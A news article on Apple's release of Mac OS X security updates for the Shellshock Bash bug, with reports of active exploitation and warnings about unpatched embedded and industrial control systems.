Apple releases Mac OS X patches for Shellshock Bash bug

Apple has released security updates for its Mac OS X operating system to protect users from the newly reported Shellshock Bash bug

Apple has released security updates for its Mac OS X operating system to protect users from the newly reported Shellshock Bash bug affecting all Unix-based computers.  

The release comes just days after Apple confirmed that Mac OS X, which is derived from Unix, was vulnerable to the bug, although the company claimed anyone using default Mac settings should be safe.

According to Apple, only users who configured advanced Unix services were at risk, but the company did not name any of the services involved.

Some users resorted to technical workarounds, but now Apple has published automatic updates for the latest versions of OS X.

Patches are available through Software Update for OS X MavericksMountain Lion and Lion.

Security experts have warned that the bug in the Bash command prompt software used in OS X and up to 500 million Unix-based computers is being actively exploited.

Researches at security firm FireEye have observed a “significant amount of overtly malicious traffic” using Bash.

This malicious traffic includes malware droppers, reverse shells and backdoors, data exfiltration, and distributed denial of service (DDoS) attacks.

The researchers think it is only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise.

Attackers have deployed scanners looking for vulnerable machines that have been bombarding networks with traffic since the 25-year-old bug was made public on 24 September.

The Shellshock bug is widely regarded as a bigger threat than the Heartbleed OpenSSL bug because it affects a thousand times more computers and is easily exploited to enable attackers to take full control of the target computer.

More on the Shellshock Bash bug

The US and UK Computer Emergency Response teams were quick to issue warnings about the Shellshock bug, and urged affected organisations to install software security updates immediately.

The Information Commissioner’s Office (ICO) has also urged organisations and individuals to make sure their IT systems are up to date.

“This flaw could be allowing criminals to access personal data held on computers or other devices. For businesses, that should be ringing real alarm bells, because they have legal obligations to keep personal information secure,” an ICO spokesperson said.

The biggest threat is to the enterprise because many web servers are run using the Apache system, software which includes the Bash component.

But, while most of the main Linux distributions have rushed to release updates, security experts have raised concerns about Unix-based embedded systems in internet of things (IoT) devices and legacy systems used by many critical national infrastructure suppliers.

Security researchers have warned that, while home users and traditional servers may be able to patch their way out of danger, this solution is not available for many embedded devices and Unix-based industrial control systems.

This also applies to supervisory control and data acquisition (Scada) systems commonly used by critical national infrastructure.

Read more on Hackers and cybercrime prevention